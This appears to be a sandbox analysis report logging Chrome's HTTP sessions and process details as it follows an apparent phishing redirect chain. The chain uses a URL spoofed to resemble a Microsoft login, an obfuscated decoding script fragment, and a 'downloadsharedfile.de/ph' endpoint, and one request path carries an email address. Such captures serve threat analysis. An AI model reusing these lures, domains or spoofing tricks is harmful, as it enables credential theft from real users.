                        Connection: keep-alive
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:21:10 UTC  475  IN  HTTP/1.1 302 Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 10 Apr 2025 17:21:10 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 198
                        Connection: close
                        X-Powered-By: Express
                        X-RateLimit-Limit: 2e+31
                        X-RateLimit-Remaining: 2e+31
                        X-RateLimit-Reset: 1744306571
                        Location: https://da48b13627.vk.com@microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ
                        Vary: Accept
                        2025-04-10 17:21:10 UTC  198  IN
                        Data Ascii: <p>Found. Redirecting to https://da48b13627.vk.com@microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ</p>


                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                        3           192.168.2.6  49704        167.172.166.226  443               4840  C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp  Bytes transferred  Direction  Data
                        2025-04-10 17:21:11 UTC  778  OUT  GET /?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ HTTP/1.1
                        Host: microsoftonelineda48b13627.cometlogistics.co.uk
                        Connection: keep-alive
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:21:12 UTC  320  IN  HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 10 Apr 2025 17:21:11 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 351
                        Connection: close
                        X-Powered-By: Express
                        X-RateLimit-Limit: 2e+31
                        X-RateLimit-Remaining: 2e+31
                        X-RateLimit-Reset: 1744306571
                        ETag: W/"15f-3M0a/pOvegNm6djT5a7IX2bYDBE"
                        2025-04-10 17:21:12 UTC  351  IN
                        Data Ascii: <!DOCTYPE html><html><head><meta charset="UTF-8"><title></title></head><body><script>!function(){try{var b=atob(location.search.slice(1).split("=")[1]);var d=decodeURIComponent(b.split("").reverse().join("")).split("").map(c=>String.fromCharCode(c.ch


                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                        4           192.168.2.6  49706        104.21.7.120     443               4840  C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp  Bytes transferred  Direction  Data
                        2025-04-10 17:21:12 UTC  726  OUT  GET /ph HTTP/1.1
                        Host: downloadsharedfile.de
                        Connection: keep-alive
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Referer: https://microsoftonelineda48b13627.cometlogistics.co.uk/
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:21:12 UTC  1044  IN  HTTP/1.1 503 Service Unavailable
                        Date: Thu, 10 Apr 2025 17:21:12 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Content-Type-Options: nosniff
                        X-Content-Type-Options: nosniff
                        X-Xss-Protection: 1; mode=block
                        X-Xss-Protection: 1; mode=block
                        X-Frame-Options: SAMEORIGIN
                        Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Pragma: no-cache
                        Expires: 0
                        Cf-Cache-Status: DYNAMIC
                        Server: cloudflare
                        Set-Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        CF-RAY: 92e3eb55ec437b0b-EWR
                        alt-svc: h3=":443"; ma=86400


                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                        5           192.168.2.6  49705        104.21.7.120     443               4840  C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp  Bytes transferred  Direction  Data
                        2025-04-10 17:21:12 UTC  1127  OUT  POST /ph HTTP/1.1
                        Host: downloadsharedfile.de
                        Connection: keep-alive
                        Content-Length: 22
                        sec-ch-ua-platform: "Windows"
                        X-Requested-TimeStamp-Combination:
                        X-Requested-TimeStamp:
                        X-Requested-Type-Combination: GET
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        isII4MbvI2APurt5ZqwJQ7mZWdg: 29292434
                        X-Requested-with: XMLHttpRequest
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        X-Requested-Type: GET
                        Content-type: application/x-www-form-urlencoded
                        X-Requested-TimeStamp-Expire:
                        Accept: */*
                        Origin: https://downloadsharedfile.de
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Referer: https://downloadsharedfile.de/ph
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY
                        2025-04-10 17:21:12 UTC | 22 | OUT | Data Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                        Data Ascii: name1=Henry&name2=Ford
                        2025-04-10 17:21:13 UTC | 1032 | IN | HTTP/1.1 204 No Content
                        Date: Thu, 10 Apr 2025 17:21:13 GMT
                        Connection: close
                        X-Content-Type-Options: nosniff
                        X-Content-Type-Options: nosniff
                        X-Xss-Protection: 1; mode=block
                        X-Xss-Protection: 1; mode=block
                        X-Frame-Options: SAMEORIGIN
                        Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Pragma: no-cache
                        Expires: 0
                        X-Server-Powered-By: Engintron
                        X-Robots-Tag: noindex, nofollow
                        Cf-Cache-Status: DYNAMIC
                        Server: cloudflare
                        Set-Cookie: cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: zxP82kLZsbWiLJLakYRBhe_cRio=1744305670; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: m6LzT-_QW3fcpiodiHY68RdARWU=1744392070; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: QCa_rcD73k-ReIxngrj7ch1bedM=QBlweyg-Tsaz5eRtnAFwxEAO3qI; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        CF-RAY: 92e3eb584e8d43ef-EWR
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.6 | 49707 | 104.21.7.120 | 443 | 4840 | C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-04-10 17:21:13 UTC | 866 | OUT | GET /favicon.ico HTTP/1.1
                        Host: downloadsharedfile.de
                        Connection: keep-alive
                        sec-ch-ua-platform: "Windows"
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: image
                        Referer: https://downloadsharedfile.de/ph
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY
                        2025-04-10 17:21:13 UTC | 554 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Apr 2025 17:21:13 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        Server: cloudflare
                        Vary: Accept-Encoding
                        X-Content-Type-Options: nosniff
                        X-Content-Type-Options: nosniff
                        X-Xss-Protection: 1; mode=block
                        X-Xss-Protection: 1; mode=block
                        Cache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutable
                        Pragma: public
                        Cf-Cache-Status: HIT
                        Age: 158916
                        CF-RAY: 92e3eb5a9bc59cdd-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-04-10 17:21:13 UTC332INData Raw: 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                        Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.6 | 49708 | 104.21.7.120 | 443 | 4840 | C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-04-10 17:21:13 UTC | 1125 | OUT | GET /ph HTTP/1.1
                        Host: downloadsharedfile.de
                        Connection: keep-alive
                        Cache-Control: max-age=0
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Referer: https://downloadsharedfile.de/ph
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY; zxP82kLZsbWiLJLakYRBhe_cRio=1744305670; m6LzT-_QW3fcpiodiHY68RdARWU=1744392070; QCa_rcD73k-ReIxngrj7ch1bedM=QBlweyg-Tsaz5eRtnAFwxEAO3qI
                        2025-04-10 17:21:14 UTC | 396 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Apr 2025 17:21:14 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        X-Content-Type-Options: nosniff
                        X-Content-Type-Options: nosniff
                        X-Xss-Protection: 1; mode=block
                        X-Xss-Protection: 1; mode=block
                        Cf-Cache-Status: DYNAMIC
                        Server: cloudflare
                        CF-RAY: 92e3eb5d4a8de8a6-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-04-10 17:21:14 UTC327INData Raw: 31 34 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                        Data Ascii: 140<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                        2025-04-10 17:21:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.6 | 49731 | 167.172.166.226 | 443 | 6120 | C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-04-10 17:22:28 UTC | 698 | OUT | GET /aruberg@grahamgoldentech.com HTTP/1.1
                        Host: 33vh88.perthshiregardenrooms.co.uk
                        Connection: keep-alive
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:22:29 UTC | 475 | IN | HTTP/1.1 302 Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 10 Apr 2025 17:22:29 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 198
                        Connection: close
                        X-Powered-By: Express
                        X-RateLimit-Limit: 2e+31
                        X-RateLimit-Remaining: 2e+31
                        X-RateLimit-Reset: 1744306571
                        Location: https://da48b13627.vk.com@microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ
                        Vary: Accept
                        2025-04-10 17:22:29 UTC198INData Raw: 3c 70 3e 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 64 61 34 38 62 31 33 36 32 37 2e 76 6b 2e 63 6f 6d 40 6d 69 63 72 6f 73 6f 66 74 6f 6e 65 6c 69 6e 65 64 61 34 38 62 31 33 36 32 37 2e 63 6f 6d 65 74 6c 6f 67 69 73 74 69 63 73 2e 63 6f 2e 75 6b 2f 3f 5f 64 61 34 38 62 31 33 36 32 37 3d 62 6e 42 6b 4c 32 6c 6b 5a 6e 56 76 5a 6d 56 74 63 47 68 75 59 6d 6c 69 63 32 68 42 61 48 4e 6d 59 33 5a 7a 59 69 52 70 63 54 42 6d 5a 53 39 6d 62 57 70 6e 5a 57 5a 7a 59 6d 6c 30 5a 57 4a 77 62 57 39 34 63 47 55 77 4d 44 74 30 63 58 56 31 61 51 3c 2f 70 3e
                        Data Ascii: <p>Found. Redirecting to https://da48b13627.vk.com@microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ</p>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.6 | 49736 | 167.172.166.226 | 443 | 6120 | C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-04-10 17:22:29 UTC | 830 | OUT | GET /?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ HTTP/1.1
                        Host: microsoftonelineda48b13627.cometlogistics.co.uk
                        Connection: keep-alive
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        If-None-Match: W/"15f-3M0a/pOvegNm6djT5a7IX2bYDBE"
                        2025-04-10 17:22:30 UTC | 269 | IN | HTTP/1.1 304 Not Modified
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 10 Apr 2025 17:22:30 GMT
                        Connection: close
                        X-Powered-By: Express
                        X-RateLimit-Limit: 2e+31
                        X-RateLimit-Remaining: 2e+31
                        X-RateLimit-Reset: 1744306571
                        ETag: W/"15f-3M0a/pOvegNm6djT5a7IX2bYDBE"


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.2.6 | 49738 | 104.21.7.120 | 443 | 6120 | C:\Program Files\Google\Chrome\Application\chrome.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-04-10 17:22:31 UTC | 1122 | OUT | GET /ph HTTP/1.1
                        Host: downloadsharedfile.de
                        Connection: keep-alive
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Referer: https://microsoftonelineda48b13627.cometlogistics.co.uk/
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY; zxP82kLZsbWiLJLakYRBhe_cRio=1744305670; m6LzT-_QW3fcpiodiHY68RdARWU=1744392070; QCa_rcD73k-ReIxngrj7ch1bedM=QBlweyg-Tsaz5eRtnAFwxEAO3qI
                        2025-04-10 17:22:31 UTC | 396 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Apr 2025 17:22:31 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        X-Content-Type-Options: nosniff
                        X-Content-Type-Options: nosniff
                        X-Xss-Protection: 1; mode=block
                        X-Xss-Protection: 1; mode=block
                        Cf-Cache-Status: DYNAMIC
                        Server: cloudflare
                        CF-RAY: 92e3ed42cac47ced-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-04-10 17:22:31 UTC327INData Raw: 31 34 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                        Data Ascii: 140<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                        2025-04-10 17:22:31 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Target ID:1
                        Start time:13:20:58
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                        Imagebase:0x7ff63b000000
                        File size:3'388'000 bytes
                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:3
                        Start time:13:21:01
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2332,i,1114976431534499065,153738974873917783,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:3
                        Imagebase:0x7ff63b000000
                        File size:3'388'000 bytes
                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:12
                        Start time:13:21:07
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html"
                        Imagebase:0x7ff63b000000
                        File size:3'388'000 bytes
                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:16
                        Start time:13:22:19
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                        Imagebase:0x7ff63b000000
                        File size:3'388'000 bytes
                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        Target ID:17
                        Start time:13:22:19
                        Start date:10/04/2025
                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --metrics-shmem-handle=1948,i,2868179512277568459,14568565378952564348,524288 --field-trial-handle=2028,i,3787505417702600662,9503551255279435640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2072 /prefetch:3
                        Imagebase:0x7ff63b000000
                        File size:3'388'000 bytes
